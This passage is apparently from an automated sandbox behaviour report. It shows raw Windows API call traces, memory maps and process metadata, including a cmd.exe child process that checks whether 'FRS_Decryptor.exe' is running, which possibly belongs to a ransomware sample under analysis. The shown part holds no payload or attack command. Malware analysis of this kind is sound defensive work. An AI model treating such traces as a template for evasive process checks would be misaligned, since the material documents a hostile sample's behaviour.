= 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _write (in: _FileHandle=1, _Buf=0xe88068*, _MaxCharCount=0x5c | out: _Buf=0xe88068*) returned 92 [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.882] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.882] LocalFree (hMem=0xe88068) returned 0x0 [0124.882] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.882] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xbfed90, nSize=0x0, Arguments=0xbfed8c | out: lpBuffer="羠è¿ᨧ\x94䰨盪❓") returned 0x61 [0124.882] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.882] _fileno (_File=0x76ea4c28) returned 1 [0124.883] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.883] GetFileType (hFile=0x28) returned 0x2 [0124.883] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xbfed54 | out: lpMode=0xbfed54) returned 0 [0124.883] GetLastError () returned 0x6 [0124.883] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xbfecb8, nSize=0x50 | out: lpBuffer="¿❓") returned 0x0 [0124.883] _fileno (_File=0x76ea4c28) returned 1 [0124.883] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0124.883] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xe88070 [0124.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xe88070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0124.883] _fileno (_File=0x76ea4c28) returned 1 [0124.883] _write (in: _FileHandle=1, _Buf=0xe88070*, _MaxCharCount=0x61 | out: _Buf=0xe88070*) returned 97 [0124.883] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0124.883] _fileno (_File=0x76ea4c28) returned 1 [0124.883] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.883] LocalFree (hMem=0xe88070) returned 0x0 [0124.883] LocalFree (hMem=0xe87fa0) returned 0x0 [0124.883] IcmpCloseHandle (IcmpHandle=0xe76b48) returned 1 [0124.883] LocalFree (hMem=0xe7c4d0) returned 0x0 [0124.883] LocalFree (hMem=0xe85270) returned 0x0 [0124.883] WSACleanup () returned 0 [0124.883] exit (_Code=0) Thread: id = 374 os_tid = 0x728 Thread: id = 375 os_tid = 0xbf4 Process: id = "131" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3b0f000" os_pid = "0x810" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6782 start_va = 0xc80000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 6783 start_va = 0xca0000 end_va = 0xca1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 6784 start_va = 0xcb0000 end_va = 0xcbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 6785 start_va = 0xcc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 6786 start_va = 0xd00000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 6787 start_va = 0xe00000 end_va = 0xe03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 6788 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 6789 start_va = 0xe20000 end_va = 0xe21fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 6790 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6791 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6792 start_va = 0x7e830000 end_va = 0x7e852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e830000" filename = "" Region: id = 6793 start_va = 0x7e859000 end_va = 0x7e85bfff entry_point = 0x0 region_type = private name = "private_0x000000007e859000" filename = "" Region: id = 6794 start_va = 0x7e85c000 end_va = 0x7e85cfff entry_point = 0x0 region_type = private name = "private_0x000000007e85c000" filename = "" Region: id = 6795 start_va = 0x7e85d000 end_va = 0x7e85dfff entry_point = 0x0 region_type = private name = "private_0x000000007e85d000" filename = "" Region: id = 6796 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6797 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6798 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6799 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6800 start_va = 0xf10000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 6801 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6802 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6803 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6804 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 6805 start_va = 0xe30000 end_va = 0xeadfff entry_point = 0xe30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6806 start_va = 0x1000000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 6807 start_va = 0x1040000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 6808 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6809 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6810 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6811 start_va = 0x7e730000 end_va = 0x7e82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e730000" filename = "" Region: id = 6812 start_va = 0xc90000 end_va = 0xc93fff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6813 start_va = 0x12e0000 end_va = 0x15b4fff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6832 start_va = 0xca0000 end_va = 0xca3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Thread: id = 376 os_tid = 0x9a4 [0124.910] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0124.910] __set_app_type (_Type=0x1) [0124.910] __p__fmode () returned 0x76ea1768 [0124.910] __p__commode () returned 0x76ea176c [0124.911] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0124.911] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0124.911] GetCurrentThreadId () returned 0x9a4 [0124.911] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x34 [0124.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0124.911] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0124.911] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.912] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.913] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdff804 | out: phkResult=0xdff804*=0x0) returned 0x2 [0124.913] VirtualQuery (in: lpAddress=0xdff813, lpBuffer=0xdff7ac, dwLength=0x1c | out: lpBuffer=0xdff7ac*(BaseAddress=0xdff000, AllocationBase=0xd00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0124.913] VirtualQuery (in: lpAddress=0xd00000, lpBuffer=0xdff7ac, dwLength=0x1c | out: lpBuffer=0xdff7ac*(BaseAddress=0xd00000, AllocationBase=0xd00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0124.913] VirtualQuery (in: lpAddress=0xd01000, lpBuffer=0xdff7ac, dwLength=0x1c | out: lpBuffer=0xdff7ac*(BaseAddress=0xd01000, AllocationBase=0xd00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0124.913] VirtualQuery (in: lpAddress=0xd03000, lpBuffer=0xdff7ac, dwLength=0x1c | out: lpBuffer=0xdff7ac*(BaseAddress=0xd03000, AllocationBase=0xd00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0124.913] VirtualQuery (in: lpAddress=0xe00000, lpBuffer=0xdff7ac, dwLength=0x1c | out: lpBuffer=0xdff7ac*(BaseAddress=0xe00000, AllocationBase=0xe00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0124.913] GetConsoleOutputCP () returned 0x1b5 [0124.913] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0124.913] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0124.913] _get_osfhandle (_FileHandle=1) returned 0x24c [0124.913] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0124.913] _get_osfhandle (_FileHandle=1) returned 0x24c [0124.913] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0124.913] _get_osfhandle (_FileHandle=0) returned 0x24 [0124.913] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0124.913] GetEnvironmentStringsW () returned 0x10440c0* [0124.914] FreeEnvironmentStringsA (penv="=") returned 1 [0124.914] GetEnvironmentStringsW () returned 0x10440c0* [0124.914] FreeEnvironmentStringsA (penv="=") returned 1 [0124.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdfe754 | out: phkResult=0xdfe754*=0x44) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x0, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x1, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x1, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x0, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x40, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x40, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x40, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegCloseKey (hKey=0x44) returned 0x0 [0124.914] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdfe754 | out: phkResult=0xdfe754*=0x44) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x40, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x1, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x1, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x0, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x9, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x4, lpData=0xdfe760*=0x9, lpcbData=0xdfe758*=0x4) returned 0x0 [0124.914] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdfe75c, lpData=0xdfe760, lpcbData=0xdfe758*=0x1000 | out: lpType=0xdfe75c*=0x0, lpData=0xdfe760*=0x9, lpcbData=0xdfe758*=0x1000) returned 0x2 [0124.914] RegCloseKey (hKey=0x44) returned 0x0 [0124.914] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500a8 [0124.914] srand (_Seed=0x5aa500a8) [0124.914] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0124.914] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0124.914] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0124.915] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10440c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0124.915] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.915] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.915] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0124.915] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.915] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.915] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.915] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.915] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.915] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.915] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.915] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.915] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.915] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xdff534 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0124.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xdff534, lpFilePart=0xdff530 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdff530*="Desktop") returned 0x1c [0124.915] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0124.915] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xdff2b0 | out: lpFindFileData=0xdff2b0) returned 0x10442d8 [0124.915] FindClose (in: hFindFile=0x10442d8 | out: hFindFile=0x10442d8) returned 1 [0124.915] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xdff2b0 | out: lpFindFileData=0xdff2b0) returned 0x10442d8 [0124.915] FindClose (in: hFindFile=0x10442d8 | out: hFindFile=0x10442d8) returned 1 [0124.915] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0124.916] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xdff2b0 | out: lpFindFileData=0xdff2b0) returned 0x10442d8 [0124.916] FindClose (in: hFindFile=0x10442d8 | out: hFindFile=0x10442d8) returned 1 [0124.916] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0124.916] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0124.916] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0124.916] GetEnvironmentStringsW () returned 0x1046190* [0124.916] FreeEnvironmentStringsA (penv="=") returned 1 [0124.916] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0124.916] GetConsoleOutputCP () returned 0x1b5 [0124.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0124.916] GetUserDefaultLCID () returned 0x409 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xdff660, cchData=128 | out: lpLCData="0") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xdff660, cchData=128 | out: lpLCData="0") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xdff660, cchData=128 | out: lpLCData="1") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0124.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0124.917] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.918] GetConsoleTitleW (in: lpConsoleTitle=0x1044e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0124.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0124.918] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0124.918] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0124.918] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0124.919] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0124.919] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0124.919] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0124.919] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0124.919] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0124.919] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0124.919] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0124.919] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0124.919] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0124.919] _wcsicmp (_String1="IF", _String2="find") returned 3 [0124.919] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0124.919] _wcsicmp (_String1="REM", _String2="find") returned 12 [0124.919] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0124.920] _pipe (in: _PtHandles=0x10451f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x10451f0) returned 0 [0124.921] _dup (_FileHandle=1) returned 5 [0124.921] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0124.921] _close (_FileHandle=4) returned 0 [0124.921] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0124.921] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0124.921] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0124.921] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0124.921] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0124.921] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0124.921] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0124.921] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0124.921] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0124.921] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0124.921] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0124.921] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0124.921] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0124.921] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0124.921] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0124.921] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0124.921] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0124.921] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0124.921] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0124.921] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0124.921] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0124.921] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0124.921] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0124.921] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0124.921] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0124.921] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0124.921] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0124.921] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0124.921] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0124.921] 